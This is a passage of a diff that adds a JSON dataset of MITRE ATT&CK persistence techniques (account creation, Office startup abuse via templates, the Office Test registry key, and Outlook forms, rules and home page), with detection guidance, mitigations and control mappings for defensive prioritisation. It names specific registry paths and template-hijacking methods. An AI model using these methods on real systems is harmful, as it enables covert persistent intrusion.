+        "detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "User Account: User Account Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1136",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.41428571428571437,
+        "adjusted_score": 0.41428571428571437,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1136.003",
+        "name": "Create Account: Cloud Account",
+        "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.",
+        "url": "https://attack.mitre.org/techniques/T1136/003",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365"
+        ],
+        "data_sources": [
+            "User Account: User Account Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1136",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.46190476190476193,
+        "adjusted_score": 0.46190476190476193,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "16.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1137",
+        "name": "Office Application Startup",
+        "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)",
+        "url": "https://attack.mitre.org/techniques/T1137",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.\n\nMany Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)\n\nMicrosoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1137.001",
+                "name": "Office Application Startup: Office Template Macros",
+                "url": "https://attack.mitre.org/techniques/T1137/001",
+                "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
+                "detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    }
+                ]
+            },
+            {
+                "tid": "T1137.002",
+                "name": "Office Application Startup: Office Test",
+                "url": "https://attack.mitre.org/techniques/T1137/002",
+                "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.",
+                "detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    }
+                ]
+            },
+            {
+                "tid": "T1137.003",
+                "name": "Office Application Startup: Outlook Forms",
+                "url": "https://attack.mitre.org/techniques/T1137/003",
+                "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)",
+                "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1137.004",
+                "name": "Office Application Startup: Outlook Home Page",
+                "url": "https://attack.mitre.org/techniques/T1137/004",
+                "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n",
+                "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1137.005",
+                "name": "Office Application Startup: Outlook Rules",
+                "url": "https://attack.mitre.org/techniques/T1137/005",
+                "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)",
+                "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1137.006",
+                "name": "Office Application Startup: Add-ins",
+                "url": "https://attack.mitre.org/techniques/T1137/006",
+                "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ",
+                "detection": "Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.3902838157142857,
+        "adjusted_score": 0.3902838157142857,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.7",
+            "4.1",
+            "4.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "7.7",
+            "9.4",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-10",
+            "AC-17",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-5",
+            "SC-18",
+            "SC-44",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2857142857142857,
+            "mitigation_score": 0.4727272727272727,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00456953
+    },
+    {
+        "tid": "T1137.001",
+        "name": "Office Application Startup: Office Template Macros",
+        "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
+        "url": "https://attack.mitre.org/techniques/T1137/001",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1137",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            }
+        ],
+        "cumulative_score": 0.2619047619047619,
+        "adjusted_score": 0.2619047619047619,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.7",
+            "4.1",
+            "4.8",
+            "9.4",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-5",
+            "SC-18",
+            "SC-44",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1137.002",
+        "name": "Office Application Startup: Office Test",
+        "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.",
+        "url": "https://attack.mitre.org/techniques/T1137/002",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1137",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            }
+        ],
+        "cumulative_score": 0.2285714285714286,
+        "adjusted_score": 0.2285714285714286,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-10",
+            "AC-14",
+            "AC-17",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "SC-18",
+            "SC-44",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1137.003",
+        "name": "Office Application Startup: Outlook Forms",
+        "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)",
+        "url": "https://attack.mitre.org/techniques/T1137/003",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1137",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.2380952380952381,
+        "adjusted_score": 0.2380952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SC-18",
+            "SC-44",
+            "SI-2",
+            "SI-8"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1137.004",
+        "name": "Office Application Startup: Outlook Home Page",
+        "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n",
+        "url": "https://attack.mitre.org/techniques/T1137/004",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
